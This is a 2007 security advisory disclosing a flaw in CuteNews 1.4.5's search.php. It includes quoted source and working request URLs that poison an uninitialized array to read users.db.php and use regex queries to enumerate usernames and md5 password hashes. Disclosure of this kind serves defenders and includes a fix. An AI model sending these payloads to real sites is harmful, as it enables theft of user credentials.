[waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

=====================================================================


Author: Janek Vind "waraxe"

Date: 24. December 2007

Location: Estonia, Tartu

Web: http://www.waraxe.us/advisory-60.html



Vulnerable software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Cute news is a powerful and easy to use news management system that

uses flat files to store its database. It supports commenting,

archives, search function, file upload management, backup & restore,

IP banning, flood protection ...


Homepage: http://cutephp.com/



Vulnerabilities:  Sensitive info disclosure in "search.php"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Let's look @ "search.php" source code ~line 158:


-------------------------->[source code]<----------------------------

if($dosearch == "yes")

{

...

        $story = trim($story);

        

        if($search_in_archives){

        ...

                $files_arch[] = "$cutepath/data/archives/$file";

        ...

        $files_arch[] = "$cutepath/data/news.txt";

------------------------->[/source code]<----------------------------



Hmm, let's see - "$files_arch" array is uninitialized before using

for file pathes storing. How about good old variable poisoning?



http://localhost/cutenews.1.4.5/search.php?dosearch=yes&files_arch[]=waraxe


and nice error message appears:


Warning: file(waraxe) [function.file]: failed to open stream: 

No such file or directory in

C:\apache_wwwroot\cutenews.1.4.5\search.php on line 188


So it seems possible to trick this search script for opening arbitrary

local files. How about "users.db.php", which contains user credentials?


Testing:

http://localhost/cutenews.1.4.5/search.php?dosearch=yes&files_arch[]=./data/users.db.php


No error messages! Search script will open user database file and will

try to parse it. Is it exploitable?


Let's have second look @ vulnerable script source:


-------------------------->[source code]<----------------------------

foreach($files_arch as $file)

{

...

$all_news_db = file("$file");

foreach($all_news_db as $news_line){

        $news_db_arr = explode("|",$news_line);

        ...

        if($title and @preg_match("/$title/i", "$news_db_arr[2]")){ $ftitle = 
TRUE; }

        if($user  and @preg_match("/\b$user\b/i", "$news_db_arr[1]")){ $fuser = 
TRUE; }

        if($story and (@preg_match("/$story/i", "$news_db_arr[4]") ...

...

if($fdate and $ftitle and $fuser and $fstory){ $found_arr[$news_db_arr[0]] = 
$archive; }

...

echo"<br /><b>Founded News articles [". count($found_arr)."]:</b><br />";

------------------------->[/source code]<----------------------------


Title, user and story variables are coming directly from GPC, so another

insecurity feature - regex manipulation - is available for us to exploit.


Let's assume, that username "john" is non valid and "waraxe" is valid

username in current Cutenews installation.


http://localhost/cutenews.1.4.5/search.php?dosearch=yes&title=waraxe&files_arch[]=./data/users.db.php


... and we see "Founded News articles [1]"

Now let's try nonexistent user:

http://localhost/cutenews.1.4.5/search.php?dosearch=yes&title=john&files_arch[]=./data/users.db.php

... and response is different: "Founded News articles [0]"

We have just seen, how username can be "pinged" from database file.


Now, let's get more serious:


http://localhost/cutenews.1.4.5/search.php?dosearch=yes&story=^[a-f0-9]{32}$&files_arch[]=./data/users.db.php


... and we see "Founded News articles [5]", which shows users count

in database with standard md5 hashes.


Sorry about long and boring storytelling, i will make it short now:

by using security vulnerabilities described above any attacker can

retrieve usernames and password md5 hashes from userdata file within

minutes. I have written two PoC scripts, "cuteuser.php" and "cutemd5.php",

which will allow to enumerate usernames and fetch password hashes from

most Cutenews targets as for today. Exploitable is newest version 1.4.5,

but older versions are vulnerable too, including CuteNews v1.3.1


Exploits are available at http://www.waraxe.us/tools/


Questions about this advisory or PoC scripts can be asked in forum:


http://www.waraxe.us/forums.html


//-----> See ya soon and have a nice day ;) <-----//


How to fix:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Initialize variables before use! In this way php variable poisoning

related security issues can be mitigated.



Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb

and anyone else who know me!

Greetings to Raido Kerna.

Tervitusi Torufoorumi rahvale!


Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[EMAIL PROTECTED]

Janek Vind "waraxe"


Homepage: http://www.waraxe.us/



Shameless advertise:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Biography Database - http://www.biosaxe.com/

Old books online - http://www.oldreadings.com/


---------------------------------- [ EOF ] --------------------------

Reply via email to